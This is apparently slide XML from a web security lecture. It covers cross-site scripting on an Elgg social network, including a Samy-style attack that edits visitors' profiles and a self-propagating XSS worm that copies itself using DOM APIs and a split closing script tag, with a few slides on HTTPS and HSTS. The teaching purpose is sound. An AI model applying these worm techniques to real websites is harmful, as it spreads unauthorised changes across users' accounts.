                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> Access level of each field: 2 means the field is viewable to everyone.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="215900" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Line </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>⑥</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>User ID (GUID) of the victim. This can be obtained by visiting victim’s profile page source. In XSS, as this value can be obtained from the page. As we don’t want to limit our attack to one victim, we can just add the GUID from JavaScript variable called </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>elgg.session.user.guid</a:t>
            </a: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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Construct the Malicious Ajax Request</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Screen Clipping" id="628" name="Google Shape;628;p103"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1456681" y="1476535"/>
            <a:ext cx="5875529" cy="2705334"/>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pic>
        <p:nvPicPr>
          <p:cNvPr descr="Screen Clipping" id="633" name="Google Shape;633;p104"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="434493" y="1196417"/>
            <a:ext cx="5860288" cy="2484335"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="634" name="Google Shape;634;p104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3107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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Construct the Malicious Ajax Request</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="635" name="Google Shape;635;p104"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4146182" y="1349406"/>
            <a:ext cx="2227524" cy="116389"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="636" name="Google Shape;636;p104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6373706" y="1119982"/>
            <a:ext cx="2770294" cy="12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To ensure that it does not modify Samy’s own profile or it will overwrite the malicious content in Samy’s profile.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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inject the into Attacker’s Profile</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="642" name="Google Shape;642;p10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85750" lvl="0" marL="400050" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Samy can place the malicious code into his profile and then wait for others to visit his profile page.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="0" marL="400050" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Login to Alice’s account and view Samy’s profile. As soon as Samy’s profile is loaded, malicious code will get executed.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="0" marL="400050" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>On checking Alice profile, we can see that “SAMY IS MY HERO” is added to the “About me” field of her profile.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4"/>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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="Google Shape;147;p34"/>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Integrating SSL/TLS with HTTP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Why not always HTTPS:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Crypto slows down the connection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Not supported by some ad-networks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Incompatible with virtual hosting for older browser</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Security Problems:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Phisher attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>HTTPS upgrades and downgrades for the same domain</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Mixed HTTPS and HTTP content </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Forged certs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>HSTS: Strict Transport Security </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Always connect over HTTPS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Self-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Propagating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> XSS Worm</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="648" name="Google Shape;648;p106"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3721366"/>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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using Samy’s worm, not only will the visitors of Samy’s profile be modified, their profiles can also be made to carry a copy of Samy’s JavaScript code. So, when an infected profile was viewed by others, the code can further spread.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Challenges: How can JavaScript code produce a copy of itself? </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Two typical approaches:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM approach: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript code can get a copy of itself directly from DOM via DOM APIs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Link approach:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> JavaScript code can be included in a web page via a link using the src attribute of the script tag.</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Self -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Propagating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> XSS Worm</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="654" name="Google Shape;654;p107"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="471375" y="1143550"/>
            <a:ext cx="7641949" cy="38209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Self-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Propagating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> XSS Worm</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="660" name="Google Shape;660;p108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="367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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Document Object Model (DOM) Approach :</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM organizes the contents of the page into a tree of objects (DOM nodes).</a:t>
            </a:r>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rPr>
              <a:t>Using DOM APIs, we can access each node on the tree.</a:t>
            </a:r>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rPr>
              <a:t>If a page contains JavaScript code, it will be stored as an object in the tree.</a:t>
            </a:r>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rPr>
              <a:t>So, if we know the DOM node that contains the code, we can use DOM APIs to get the code from the node.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>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rPr>
              <a:t>Every JavaScript node can be given a name and then use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>document.getElementByID()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> API to find the node.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0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Self-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Propagating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> XSS Worm</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="666" name="Google Shape;666;p109"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="386800" y="1144075"/>
            <a:ext cx="5915200" cy="1560050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="667" name="Google Shape;667;p109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377625" y="2860400"/>
            <a:ext cx="8520600" cy="2057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Use “document.getElementById(“worm”) to get the reference of the node</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6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innerHTML gives the inside part of the node, not including the script tag.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="6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So, in our attack code, we can put the message in the description field along with a copy of the entire code.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Self-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Propagating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> XSS Worm</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="673" name="Google Shape;673;p110"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="256050" y="1187975"/>
            <a:ext cx="5483424" cy="3264525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="674" name="Google Shape;674;p110"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5869025" y="1006250"/>
            <a:ext cx="3186900" cy="38409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Line </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>①</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Construct a copy of the worm code, including the script tags.</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Line </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>We split the string into two parts and use “+” to concatenate them together. If we directly put the entire string, Firefox’s HTML parser will consider the string as a closing tag of the script block and the rest of the code will be ignored.</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Self-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Propagating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> XSS Worm</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="680" name="Google Shape;680;p111"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="500250" y="1124475"/>
            <a:ext cx="8332200" cy="37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Line </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>③</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
